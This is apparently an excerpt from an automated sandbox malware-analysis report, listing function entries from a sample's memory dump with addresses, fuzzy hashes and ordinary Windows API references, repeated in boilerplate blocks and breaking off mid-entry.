Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 3f9df2504dbb59d927c5140cc641b30de3cf24a571773f690ebfd941939dc2d4
Instruction ID: b95adb6a2eb40f99991d2bbd044b31fc88b122aa31eda0c5d46866b9120e439a
Opcode Fuzzy Hash: 3f9df2504dbb59d927c5140cc641b30de3cf24a571773f690ebfd941939dc2d4
Instruction Fuzzy Hash: FAC01232058281BECB010BB0DD19D2FBBA8ABA5212F05C90AB2A5D2060EA38C010DB11

Function 00B719A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B719AB

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0f6e43801793db3fca7cd997603d48f1975c240ee24567e417f4e82659f1c59b
Instruction ID: 6912406569b5e271e5abeedc0bda9ab8b40c8f4a2430696c8c5e0c4447eba181
Opcode Fuzzy Hash: 0f6e43801793db3fca7cd997603d48f1975c240ee24567e417f4e82659f1c59b
Instruction Fuzzy Hash: CAC16D70A042549FEF15CF6CC485BA97BE5EF0A310F0888F9EC699B286DB319945CB71

Function 00B73B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B73B42

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bc93b2f9c2fa6c92b312a1f9668b659da44828202e522c09a21648d4b26a20da
Instruction ID: 4a0e90ba2eb753ce9f922898a9b3990a256d450ca3ed90a11203f4f6ae24d68d
Opcode Fuzzy Hash: bc93b2f9c2fa6c92b312a1f9668b659da44828202e522c09a21648d4b26a20da
Instruction Fuzzy Hash: 6771AE71104F449EDB26DB34CC81AE7B7E8EB14701F4489AEE5AE47282DB316A48EF10

Function 00B7837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B78384

Part of subcall function 00B71380: __EH_prolog.LIBCMT ref: 00B71385
Part of subcall function 00B71380: new.LIBCMT ref: 00B713FE

Part of subcall function 00B719A6: __EH_prolog.LIBCMT ref: 00B719AB

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bff5e735adfad3d92121dc1972e8cf72be6e06c1d8ad42a36a770cca2f4b27e3
Instruction ID: 67f8592b9094432c09c4abb1ef0f05bdc03922055a5e46f40892592418737571
Opcode Fuzzy Hash: bff5e735adfad3d92121dc1972e8cf72be6e06c1d8ad42a36a770cca2f4b27e3
Instruction Fuzzy Hash: B941B4318446549ADB20EB64CC55BEA73E8AF50300F0484EAE5AEA7192DFB45EC8DB60

Function 00B71E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B71E05

Part of subcall function 00B73B3D: __EH_prolog.LIBCMT ref: 00B73B42

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2f67202b06ac6d18ccd2ff95d2e6e643636ec9de214a1af195f0822fdc1b1af6
Instruction ID: 2a9c152c75071ffe8dd9545d4998dc8676d647493e6592443225ff53ab3d6ff6
Opcode Fuzzy Hash: 2f67202b06ac6d18ccd2ff95d2e6e643636ec9de214a1af195f0822fdc1b1af6
Instruction Fuzzy Hash: 4D213C329051089FCB15EF9DD9419EEBBF5FF58300B1048ADE859A7251CB325E10DB60

Function 00B8A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B8A7C8

Part of subcall function 00B71380: __EH_prolog.LIBCMT ref: 00B71385
Part of subcall function 00B71380: new.LIBCMT ref: 00B713FE

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f5884148256d0b4024652015a1dbb39b54d67088fcb13f89a785e9cb08d4478a
Instruction ID: c3bf30ed02693b882396fec42983e07170948794eb344a1897ec805b10ee6735
Opcode Fuzzy Hash: f5884148256d0b4024652015a1dbb39b54d67088fcb13f89a785e9cb08d4478a
Instruction Fuzzy Hash: F7212C71C04249AACF15EF98C9515EEB7F4EF19300F1044EAE819A7252D735AE06DB71

Function 00B792E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B792EB

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b54b9da43dd85b82bcda6f822bd9946e16a7dd0399397933f823b3e72456fd9c
Instruction ID: 9da4dfa8dfa310f06e92caa88da33de402fff5ee178780e2e96112b9e1c8f166
Opcode Fuzzy Hash: b54b9da43dd85b82bcda6f822bd9946e16a7dd0399397933f823b3e72456fd9c
Instruction Fuzzy Hash: E911A573D005289BCB22AFA8CC419DDBBB5EF48750F018199F82DB7251CA358D1087A4

Function 00B9BB8A Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00B985A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B98FD3,00000001,00000364,?,00B93713,00000050,?,00BB0EE8,00000200), ref: 00B985EA

_free.LIBCMT ref: 00B9BBF6

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
Instruction ID: be9d0a12b7ff3392f28aa5acb1917aec8e8f465fc80d6709c05b6c4899afc4cf
Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
Instruction Fuzzy Hash: E801F9722003096BEB218F65D885D5AFBE9FB85370F2605BDE594832C0EB30A805C774

Function 00B7AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00B7AA9A

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: 920e35ab6f74022e4776a529899c973cbaa547da26dee73a634924164c103fc7
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: 2CF08C30904B059FDBB0DE74C941A1AB7E8EB51320F20C99AE4BEC2690E770D880C752

Function 00B985A9 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B98FD3,00000001,00000364,?,00B93713,00000050,?,00BB0EE8,00000200), ref: 00B985EA

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a0544fe64125ce0007df6326c62f32859ba560da9c27d41acf775ab95cb185b5
Instruction ID: e36b8f680158637c7df82b36f4e9c2678d8c3979eace59ada2041b1f5c5c4faa
Opcode Fuzzy Hash: a0544fe64125ce0007df6326c62f32859ba560da9c27d41acf775ab95cb185b5
Instruction Fuzzy Hash: C3F0E931644121BBDF215E269C05B5B7BC8EF637A0B2681B1BC18E7081CE20DD058AE4

Function 00B75BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B75BDC

Part of subcall function 00B7B07D: __EH_prolog.LIBCMT ref: 00B7B082

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5a313a645ad40c419422bb20f63adebd74527c91de1cfab7abedafb8d9d99140
Instruction ID: 493a5b499302208b1c0a1119d031d510c755efeaf6508ce6c23f07af1fcd88fe
Opcode Fuzzy Hash: 5a313a645ad40c419422bb20f63adebd74527c91de1cfab7abedafb8d9d99140
Instruction Fuzzy Hash: F001AD30A04684DAC724F7A8C0057EDF7E49F19300F4090DDA8AE23283CBB01B08C766

Function 00B98518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B9C13D,00000000,?,00B967E2,?,00000008,?,00B989AD,?,?,?), ref: 00B9854A

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 21480d8dbc6d7156fac5fc463ffefceb9254b616e232242f283d83d5cfd59f7c
Instruction ID: 0df4f6f6fff014dcc90b73af4b685ae65abf2ba06a434f978926efc9880acf24
Opcode Fuzzy Hash: 21480d8dbc6d7156fac5fc463ffefceb9254b616e232242f283d83d5cfd59f7c
Instruction Fuzzy Hash: DBE0ED21644221ABEF312A699C02B9A7BCCDF637B0F1702B0BC18E6081CE20CC0485E9

Function 00B7A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B7A4F5

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 864656dc5c083d6f1becc50ae2f475cf72fbb3931275f28d594e64ce4900c7a8
Instruction ID: c538a0a1987c1dcc1b2c62b8ed653905cc65dcb8c9dee39151ff04744471f7fe
Opcode Fuzzy Hash: 864656dc5c083d6f1becc50ae2f475cf72fbb3931275f28d594e64ce4900c7a8
Instruction Fuzzy Hash: 5AF0E931009380AACB721B784804BCEBBD0AF56331F04CA8DF1FD12191C2B554C59723

Function 00B8067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00B806B1

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 0f4433ffc159243dc8c4489a455f195f7116a4c43410911449edd8d3abff6d6c
Instruction ID: 09111ef18901ad117e6f9f51312f7fa6593f9434edacf1ef6b85579b3b040e51
Opcode Fuzzy Hash: 0f4433ffc159243dc8c4489a455f195f7116a4c43410911449edd8d3abff6d6c
Instruction Fuzzy Hash: 63D0C22172111036C6213328A8067FF1ACA4FC3750F0800E1B00D231A28E86088BD7A2

Function 00B89D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00B89D81

Part of subcall function 00B89B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B89B30

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 16e6ea067f320fed3acc97f405a8a51fa3e7a0327bc62a11cd193a24e1c47ffb
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: 36D0C73065420DBADF41BE759C02A7A7BE9DB00350F1441B5BC0886161ED71DE20E765

Function 00B79989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00B79887), ref: 00B79995

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: c2c2b4b2462c9893e268096d9ae8ac6abe430e0582b5560da5f8690303cc7975
Instruction ID: 64da4bf6e35775844b6ae06700dbd911464e1d65a4cc5e6c3d84a970f1db98fc
Opcode Fuzzy Hash: c2c2b4b2462c9893e268096d9ae8ac6abe430e0582b5560da5f8690303cc7975
Instruction Fuzzy Hash: F2D01231011140959F3546344D0A199B7D1DB83376B38C6E8E139C50A1D723C803F541

Function 00B8D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00B8D43F

Part of subcall function 00B8AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B8AC85
Part of subcall function 00B8AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B8AC96
Part of subcall function 00B8AC74: IsDialogMessageW.USER32(0001040E,?), ref: 00B8ACAA
Part of subcall function 00B8AC74: TranslateMessage.USER32(?), ref: 00B8ACB8
Part of subcall function 00B8AC74: DispatchMessageW.USER32(?), ref: 00B8ACC2

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 81b3dbe8d4f56a2efa1cb022fa09c060b5f33d2672fef8ad4088ea162d5d83d1
Instruction ID: 3d505e67cd5ae7561f4bc422916ef6c1929280cb662612135d9a6b5c2f9ec683
Opcode Fuzzy Hash: 81b3dbe8d4f56a2efa1cb022fa09c060b5f33d2672fef8ad4088ea162d5d83d1
Instruction Fuzzy Hash: F0D09E31144300ABD6112B51CE07F1F7AE6AB98B05F004695B348750B18A62AD20DB16

Function 00B8D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a1fa992fc04c5b2465ab822cfe8b94dfa76e0d405646551048a6229f37736385
Instruction ID: af2a79476e39d31df5bfff6e325914d5dffeafd29f65cba9c2101963cefca914
Opcode Fuzzy Hash: a1fa992fc04c5b2465ab822cfe8b94dfa76e0d405646551048a6229f37736385
Instruction Fuzzy Hash: AFB0129226C0017C31087214AC42E3607ECC4C3B10330C0EBB549E02E1E4409C099631

Function 00B8D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
